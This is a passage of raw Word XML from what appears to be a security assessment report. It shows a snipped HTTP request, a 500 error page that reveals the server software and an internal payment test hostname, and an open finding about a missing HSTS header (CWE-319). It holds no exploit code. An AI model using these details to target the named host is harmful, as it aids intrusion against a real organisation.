                <w:p w14:paraId="7155C483" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="0071699B" w:rsidRDefault="0071699B" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept: text/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>html,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xhtml+xml,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xml;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.9,*/*;q=0.8</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0260CC35" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="0071699B" w:rsidRDefault="0071699B" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Language: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>en-US,en;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.5</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5686AF0C" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="0071699B" w:rsidRDefault="0071699B" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0071699B">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="0B876782" w14:textId="77777777" w:rsidR="0071699B" w:rsidRDefault="0071699B" w:rsidP="00803C34">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="649A9FB2" w14:textId="77777777" w:rsidR="0071699B" w:rsidRPr="00130097" w:rsidRDefault="0071699B" w:rsidP="00803C34">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00130097">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="00130097" w:rsidRPr="00130097" w14:paraId="2A6FE8FA" w14:textId="77777777" w:rsidTr="00130097">
              <w:trPr>
                <w:trHeight w:val="4910"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="1AED55B8" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:lastRenderedPageBreak/>
                    <w:t xml:space="preserve">HTTP/1.1 </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>500 Internal Server Error</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1DFE3675" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>Date: Tue, 28 May 2019 15:35:40 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3C7BEC56" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>Content-Length: 615</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7926842B" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="55A95929" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>Content-Type: text/html; charset=iso-8859-1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5CCE5754" w14:textId="77777777" w:rsidR="00130097" w:rsidRDefault="00130097" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="72F91EC2" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5A1DF23C" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;html&gt;&lt;head&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="49E2C814" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;title&gt;</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>500 Internal Server Error</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;/title&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1C2290C4" w14:textId="77777777" w:rsid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rPr>
                    <w:t>&lt;/head&gt;&lt;body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="75187F73" w14:textId="77777777" w:rsidR="00130097" w:rsidRPr="00130097" w:rsidRDefault="00130097" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="47DE4D39" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;h1&gt;Internal Server Error&lt;/h1&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="364553A8" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;p&gt;The server encountered an internal error or</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1CA7269B" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>misconfiguration and was unable to complete</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5380C23A" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>your request.&lt;/p&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0DA81493" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;p&gt;Please contact the server administrator,</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0429F54B" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>you@your.address</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> and inform them of the time the error occurred,</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="58B3DFF6" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>and anything you might have done that may have</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="07A3D688" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>caused the error.&lt;/p&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3369E40B" w14:textId="77777777" w:rsidR="00130097" w:rsidRPr="00130097" w:rsidRDefault="00130097" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;p&gt;</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>More information about this error may be available</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="005E3C29" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>in the server error log</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>.&lt;/p&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3A36B348" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>hr</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5F88A873" w14:textId="77777777" w:rsidR="00130097" w:rsidRP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rPr>
                    <w:t>&lt;address&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>IBM_HTTP_Server</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> at payment.sit2.va.anthem.com Port 443</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;/address&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="18B31D18" w14:textId="77777777" w:rsidR="00130097" w:rsidRPr="00130097" w:rsidRDefault="00130097" w:rsidP="00280358">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00130097">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="22498EB2" w14:textId="77777777" w:rsidR="00130097" w:rsidRPr="00803C34" w:rsidRDefault="00130097" w:rsidP="00130097">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FD42B1A" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098693F0" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="365A82C7" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="228B22"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0AE60BAC" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="16" w:name="_Toc10703676"/>
            <w:r>
              <w:t>L3</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Missing Safeguard: HTTP Strict Transport Security (HSTS) Header</w:t>
            </w:r>
            <w:r w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r>
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="16"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7F40D2F7" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4957D619"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49BD53B3" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId33" w:anchor="CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:N/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="009A101C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>3.0</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="5862CC51" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="74EA3EDF"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="597AD5A4" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-319: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cleartext</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Transmission of Sensitive Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="0B371604" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6145342A"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36EF08F3" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="009A101C" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1E4EE2DD" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5B5452B8"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4CF650AF" w14:textId="77777777" w:rsidR="009A101C" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The application does not utilize the HTTP Strict Transport Security Header or HSTS Header to instruct browsers to not allow plain text submission of data to the application. The tester observed that the application&amp;#39</w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>; s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> HTTP responses do not contain the HTTP Strict Transport Security (HSTS) Header.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20821C5F" w14:textId="77777777" w:rsidR="009A101C" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A873756" w14:textId="77777777" w:rsidR="009A101C" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
